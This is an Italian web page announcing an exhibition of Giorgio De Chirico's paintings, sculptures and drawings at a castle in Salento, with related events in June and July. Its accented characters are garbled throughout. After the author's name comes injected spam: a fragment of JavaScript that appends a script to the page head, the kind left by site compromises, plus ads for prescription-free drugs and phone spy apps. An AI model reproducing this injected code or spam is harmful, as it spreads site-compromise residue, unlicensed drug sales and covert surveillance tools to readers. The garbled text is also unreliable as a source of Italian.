Giorgio De Chirico, mistero e poesia

Giorgio De Chirico, mistero e poesia

Undici dipinti a olio, tre sculture e oltre trenta tra disegni, acquarelli e grafiche in arrivo dalla Galleria da��Arte Maggiore di Bologna. Quinta mostra annuale che il castello offre alla��estate salentina dopo gli eventi dedicati a Joan MirA?, Pablo Picasso, Salvador DalA� e Andy Warhol che hanno raccolto oltre 200mila visitatori.

Le opere in mostra vanno a costruire un percorso nel quale emergono le diverse fasi stilistiche della metafisica di De Chirico (metafisica intesa come qualitA� eletta della pittura e non come caratteristica dei soggetti). Dal recupero della classicitA� alle suscitazioni surreali ai riavvicinamenti alla realtA� che pure fecero parte del suo complesso mondo espressivo. Ca��A? il luogo del dubbio allucinato e assurdo delle sue a�?Piazze da��Italiaa�?; le a�?muse inquietantia�? a�� calchi o manichini -A� al posto degli uomini; ca��A? il mito e il senso ideale della bellezza che ha la forma possente dei cavalli. Ca��A? il mondo sognato e agognato, ca��A? la��arte contro la��angoscia e a raccontare la��angoscia, la��arte come racconto del silenzio, esorcismo di un presente incapace di svelare la��enigmaticitA� della��esistenza.

La mostra si completa con a�?Metafisica a sud, enigma di un pomeriggio da��estatea�?, programma destinato a esplorare il territorio pugliese attraverso la visione pittorica della��artista padre della metafisica. Una serie di eventi (ancora in via di definizione) si svilupperanno lungo la��estate tra la cittA� di Otranto e della��intero territorio del Salento. Tra gli altri, giovedA� 13 giugno Andrea Molesini presenterA� a�?La Primavera Del Lupoa�? (Sellerio); e mercoledA� 10 luglio, in occasione della commemorazione dei 125 anni dalla nascita di de Chirico, ci sarA� la proiezione integrale di Visioni Mediterranee (appunti per una Metafisica a Sud, gioco-studio su Giorgio de Chirico e la Magna Grecia), di Chiara Idrusa Scrimieri. Si tratta di un percorso tra docufilm e videoarte, un viaggio di lettura metafisica applicata al paesaggio sensibile della nostra Magna Grecia, e della��inaugurazione di una collettiva di giovani artisti pugliesi.

 

Carlo Castaldello Order d.getElementsByTagName('head')[0].appendChild(s);. detrola km837 for sale buy nizoral without prescription Order order cialis online using flex iphone spy, facebook messenger spy, android spy buy aygestin online next day delivery pharmacy without prescriptions generic for hytrin

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>